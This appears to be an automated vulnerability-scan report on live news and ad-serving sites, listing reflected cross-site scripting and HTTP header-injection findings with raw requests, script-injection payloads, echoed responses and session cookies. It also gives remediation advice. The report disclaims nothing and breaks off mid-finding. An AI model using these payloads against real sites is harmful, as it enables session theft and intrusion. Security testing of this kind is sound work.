GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4069024%7E%7E0%5EebAdDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebAboveTheFoldDuration%7E899%7E0%7E1%7E0%7E2%7E0%7E0%5EebVideoPlayDuration%7E18%7E0%7E1%7E0%7E1%7E0%7E0%5EebVideoAssetDuration%7E18%7E0%7E1%7E0%7E1%7E11117176%7E0%5EebVideoFullPlay%7E0%7E0%7E1%7E0%7E1%7E11117176%7E0&OptOut=0&ebRandom=0.7502016185317189&flv=10.1103&wmpv=1cada%0d%0a5d5c234479e&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio Origin: http://www.informationweek.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload bf34f%0d%0aa00cfe1a23b was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72978"><script>alert(1)</script>ab87667034 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html72978"><script>alert(1)</script>ab87667034 HTTP/1.1 Host: 7thspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <html> <head> <title>Cloud Connect Launch Pad Finalist to Showcase MaxiScale FLEX Software Platform</title> <meta name="description" CO ...[SNIP]... <form id="7_comments_submit_form" method="post" action="/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html72978"><script>alert(1)</script>ab87667034#cst" onsubmit="rememberfields()" style="display:none;"> ...[SNIP]...
3.2. http://7thspace.com/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbed9"><script>alert(1)</script>d34128e6770 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html?fbed9"><script>alert(1)</script>d34128e6770=1 HTTP/1.1 Host: 7thspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <html> <head> <title>Cloud Connect Launch Pad Finalist to Showcase MaxiScale FLEX Software Platform</title> <meta name="description" CO ...[SNIP]... <form id="form2" method="post" action="/headlines/337784/cloud_connect_launch_pad_finalist_to_showcase_maxiscale_flex_software_platform.html?fbed9"><script>alert(1)</script>d34128e6770=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload ae786--><script>alert(1)</script>c1a688e3275 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstractae786--><script>alert(1)</script>c1a688e3275/10/4754/Messaging-Collaboration/research-social-networking.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:35 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:35 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ript%3Ealert%281%29%3C%2Fscript%3Ec1a688e3275%2F10%2F4754%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstractae786--><script>alert(1)</script>c1a688e3275/10/4754/Messaging-Collaboration/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 4cbf8--><script>alert(1)</script>caa7cf49b0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/104cbf8--><script>alert(1)</script>caa7cf49b0e/4754/Messaging-Collaboration/research-social-networking.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:00 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:00 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... script%3Ealert%281%29%3C%2Fscript%3Ecaa7cf49b0e%2F4754%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/104cbf8--><script>alert(1)</script>caa7cf49b0e/4754/Messaging-Collaboration/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 52eaf--><script>alert(1)</script>6554ec6cc27 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/475452eaf--><script>alert(1)</script>6554ec6cc27/Messaging-Collaboration/research-social-networking.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:06 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:06 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Cscript%3Ealert%281%29%3C%2Fscript%3E6554ec6cc27%2FMessaging-Collaboration%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/475452eaf--><script>alert(1)</script>6554ec6cc27/Messaging-Collaboration/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 305ab--><script>alert(1)</script>dcba560a1d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/4754/Messaging-Collaboration305ab--><script>alert(1)</script>dcba560a1d/research-social-networking.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:13 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:13 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45983
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Edcba560a1d%2Fresearch-social-networking.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration305ab--><script>alert(1)</script>dcba560a1d/research-social-networking.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload baf9c--><script>alert(1)</script>2532fb38a24 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/4754/Messaging-Collaboration/research-social-networking.htmlbaf9c--><script>alert(1)</script>2532fb38a24 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:20 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:20 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2532fb38a24&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.htmlbaf9c--><script>alert(1)</script>2532fb38a24"> ...[SNIP]...
3.8. http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8b59d--><script>alert(1)</script>ea486472576 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/10/4754/Messaging-Collaboration/research-social-networking.html?8b59d--><script>alert(1)</script>ea486472576=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Cscript%3Ealert%281%29%3C%2Fscript%3Eea486472576%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/10/4754/Messaging-Collaboration/research-social-networking.html?8b59d--><script>alert(1)</script>ea486472576=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 58d2b--><script>alert(1)</script>8691f40a2e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract58d2b--><script>alert(1)</script>8691f40a2e4/14/4774/Regulatory-Compliance/strategy-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:33 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:37 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... -%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8691f40a2e4%2F14%2F4774%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract58d2b--><script>alert(1)</script>8691f40a2e4/14/4774/Regulatory-Compliance/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 47164--><script>alert(1)</script>d17787e4872 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/1447164--><script>alert(1)</script>d17787e4872/4774/Regulatory-Compliance/strategy-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:00 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:00 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed17787e4872%2F4774%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/1447164--><script>alert(1)</script>d17787e4872/4774/Regulatory-Compliance/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload a1c0a--><script>alert(1)</script>0b4fea96c73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774a1c0a--><script>alert(1)</script>0b4fea96c73/Regulatory-Compliance/strategy-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:06 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:07 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... c0a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0b4fea96c73%2FRegulatory-Compliance%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774a1c0a--><script>alert(1)</script>0b4fea96c73/Regulatory-Compliance/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 55c09--><script>alert(1)</script>bf3e5338c9e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774/Regulatory-Compliance55c09--><script>alert(1)</script>bf3e5338c9e/strategy-compliance.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:13 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:13 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 55c09--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebf3e5338c9e%2Fstrategy-compliance.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance55c09--><script>alert(1)</script>bf3e5338c9e/strategy-compliance.html"> ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload cf1ae--><script>alert(1)</script>980e8f9ba54 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /abstract/14/4774/Regulatory-Compliance/strategy-compliance.htmlcf1ae--><script>alert(1)</script>980e8f9ba54 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:21 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:21 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45967
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... mlcf1ae--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E980e8f9ba54&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.htmlcf1ae--><script>alert(1)</script>980e8f9ba54"> ...[SNIP]...
3.14. http://analytics.informationweek.com/abstract/14/4774/Regulatory-Compliance/strategy-compliance.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4c7d2--><script>alert(1)</script>6d9f708ac4a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
